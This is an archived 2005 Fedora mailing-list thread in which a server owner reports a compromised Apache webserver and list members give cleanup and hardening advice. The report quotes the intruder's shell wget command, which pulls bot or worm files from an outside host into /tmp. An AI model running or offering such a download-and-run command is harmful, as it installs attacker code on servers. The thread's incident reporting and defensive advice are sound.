Server compromissed

[Jeff Vian]

On Fri, 2005-02-18 at 16:20 -0800, paul at topguncomputers.com wrote:
> > On Thu, 17 Feb 2005 22:20:02 -0800 (PST), paul at topguncomputers.com
> > <paul at topguncomputers.com> wrote:
> >> Apparently someone has hacked into my webserver.  And is installing perl
> >> scripts into he /tmp/ directory.  There usually named .linuxday* or
> >> .cinta* and a few other names as well.
> >>
> >> >From what I can tell something is causing apache to run a command like
> >> "sh
> >> wget  bot.linuxday.com.br -O {the above mentioned files are than
> >> listed}"
> >>
> >> sometimes the site is worm.linuxday.com.br
> >>
> >> I'm curious if anyone has heard about this before.  I'm currently
> >> running
> >> Fedora 1  with all the latests security patches.
> >
> > The only way to ensure your system is clean, and likely to remain clean,
> > is to:
> >
> > 1. Do a bare metal install
> > 2. Change all passwords to new strong passwords
> > 3. Disable cleartext services, ftp, telnet, rsh, etc.
> > 4. Disable root remote login (use su or sudo)
> > 5. Restore your uncompromised data
> > 6. etc.
> > I had to do this for a client and the next 3 days the intruder tried
> > to get back in.
> >
> > --
> > Leonard Isham, CISSP
> > Ostendo non ostento.
> >
> > --
> > fedora-list mailing list
> > fedora-list at redhat.com
> > To unsubscribe: http://www.redhat.com/mailman/listinfo/fedora-list
> >
> 
> In replace of FTP what would you suggest. That is the only clear text
> password service I allow. So what else can I use in replace of that.
> 
> And shell access is denied for all accounts.  except for 2.
> 
> I get the feeling this came in on awstats all though I'm not 100% positive
> and I'm wanting to find out how it got in first before I just delete and
> restart over again.
> 
For foreniscs, take that disk and save it.
Use a clean drive to reinstall

analysis can be done later, after following the suggestions to reinstall
and lock down.